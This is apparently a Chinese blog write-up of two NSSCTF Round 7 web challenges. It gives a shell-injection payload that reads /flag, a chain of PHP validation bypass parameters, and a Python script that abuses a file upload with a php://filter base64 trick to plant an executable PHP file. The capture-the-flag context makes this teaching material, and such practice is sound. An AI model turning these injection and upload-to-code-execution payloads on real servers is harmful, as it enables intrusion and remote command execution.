强烈建议NSSCTF延长时间，大过年的逛亲戚回来就剩两个小时了。。。。

ez_rce

刚看到差点被这个被这个吓到，还以为第一题就是java安全，仔细一看就是运行了一个jar文件，然后我们可以自定义action和data的值，这里就可以用到||这个了，||旁边两个都可以执行的，最后闭合一下单引号就可以了。

post传：action=||&data='cat /flag'

0o0

这里没有发现什么有用的东西，我们去扫一扫目录看看，然后我们就发现了，一个关键的文件，.D

//我们直接使用wget下载过来wget http://43.143.7.97:28537/.DS_Store

vim -r尝试恢复一下，但是没有成功，接下来就直接看看里面的内容，有没有什么信息。

这里我们看到了一个文件，我们尝试访问一下。

//Ns_SCtF.php';$real_name = fopen($file_name, "w");fwrite($real_name, $real_content);fclose($real_name);echo "OoO0o0hhh.";                        } else {die("NoO0oO0oO0!");                        }                    } else {                        die("N0o0o0oO0o!");                    }                } else {                    die("NoOo00O0o0!");                }            } else {                die("Noo0oO0oOo!");            }        } else {            die("NO0o0oO0oO!");        }    } else {        die("No0o0o000O!");    }} else {    die("NO0o0o0o0o!");} NO0o0o0o0o!

 我们拆开来一个一个分析。

if ($NSSCTF != $NsSCTF && sha1($NSSCTF) === sha1($NsSCTF)) 

这里我们可以通过数组绕过

payload：?NSSCTF[]=1&NsSCTF[]=2

if (!is_numeric($NsScTF) && in_array($NsScTF, array(1)))

这里is_numeric是检测我们传入的东西是不是另一个数字或者一个数字字符串，因为有!，所以我们传入的东西不能是数字，但是后面in_array是查询我们传入的值有没有在数组中，他的数组中只有一个1，所以我们需要传入一个1

这里我们可以使用%00截断

payload: &NsScTF=1%00

if (file_get_contents($NsScTf) === "Welcome to Round7!!!")

file_get_contents是可以读取文件内容的，这里我们可以利用data伪协议

 payload：&NsScTf=data://text/plain,Welcome to Round7!!!

if (isset($_GET['nss_ctfer.vip']))

这里有特殊字符，_这个十分重要，我们假如按正常的参数输入，他是不会接收的，我们要使用[代替_。

payload:&nss[ctfer.vip=true

if ($NSScTf != 114514 && intval($NSScTf, 0) === 114514)

这里不能等于114514，但是经过intval函数要等于114514，这里base参数设置的就是0他会根据我们传入的值判断要转换的整数。

这里我们可以通过科学计数法绕过

payload:&NSScTf=114514e1

$nss = is_numeric($nSScTF) and is_numeric($nSscTF) !== "NSSRound7";if ($nss && $nSscTF === "NSSRound7")

这里还是is_numeric函数，分析下来nSScTF只要传递一个数字就可以了，然后就是nSscTF其实就是直接传NSSRound7就可以了

payload：&nSScTF=1&nSscTF=NSSRound7

//完整Ns_SCtF.php?NSSCTF[]=1&NsSCTF[]=2&NsScTF=1%00&NsScTf=data://text/plain,Welcome to Round7!!!&nss[ctfer.vip=true&NSScTf=114514e1&nSScTF=1&nSscTF=NSSRound7

if (isset($_POST['submit'])) {   $file_name = urldecode($_FILES['file']['name']);   $path = $_FILES['file']['tmp_name'];   if(strpos($file_name, ".png") == false){       die("NoO0P00oO0! Png! pNg! pnG!");   }   $content = file_get_contents($path);   $real_content = '';   $real_name = fopen($file_name, "w");   fwrite($real_name, $real_content);   fclose($real_name);   echo "OoO0o0hhh.";} else {   die("NoO0oO0oO0!");

这里分析一下我们先post给subimt随便输入一个值就可以了，然后就是他会进入判断中，然后就是通过file参数来文件上传，这里还会进行一次url解密，然后他还会生成一个临时文件，然后就是strpos函数，让文件名中必须有.png，然后就会读取临时文件赋值给content，然后和die组成一个新的php代码，然后在当前目录中生成一个和我们上传的文件，一样名字的文件，然后将那一串代码写进去。

关于strpos哪里我们可以使用1.png.php来让文件进行php操作。

然后我们就需要绕过die函数，这里和绕过死亡exit很像，这里给大家探姬写的文章，感觉写的很厉害。

tj的文章

这里的意思很简单，我们把一串base64写入那里，然后使用伪协议将他进行一次解码，从而使die没了，当然不止可以使用base64还有很多方法，这里还可以参考这里死亡exit

// base64编码PD9waHAgc3lzdGVtKCdlY2hvIDEnKTs/Pg==//我们将上面那一串当做文件内容上传，这时候生成的文件的内容//注意这里我们要补3个字母

这里解码我们发现前面就成了乱码，这里就可以解析我们上传的内容了。

 但是怎么才能让他解码，这里我们可以使用php://filter/convert.base64-decode/resource=1.png.php，记得上面有一次url解码，所以我们要进行加密一次

import requestsfrom base64 import b64encodeimport redef get_flag(URL):    url = f"{URL}/Ns_SCtF.php?NSSCTF[]=1&NsSCTF[]=2&NsScTF=1%00&NsScTf=data://text/plain,Welcome%20to%20Round7!!!&nss[ctfer.vip=true&NSScTf=114514e1&nSScTF=1&nSscTF=NSSRound7"    data = {'submit':1}    payload = str(b64encode(b"")) #修改为自己想要执行的命令    payload = re.findall(r"b'(.*?)'",payload)[0]    file1 = {'file': ('1.png.php', f"aaa{payload}")}    file2 = {'file': ('%70%68%70%3a%2f%2f%66%69%6c%74%65%72%2f%63%6f%6e%76%65%72%74%2e%62%61%73%65%36%34%2d%64%65%63%6f%64%65%2f%72%65%73%6f%75%72%63%65%3d%31%2e%70%6e%67%2e%70%68%70', f"aaa{payload}")}    requests.post(url,data=data,files=file1)    requests.post(url,files=file2,data=data)    nssctf_text3 = requests.post(f'{URL}/1.png.php').text    print(nssctf_text3)if __name__ == "__main__":    get_flag("http://43.143.7.127:28479")

来源地址：https://blog.csdn.net/m0_64815693/article/details/128784449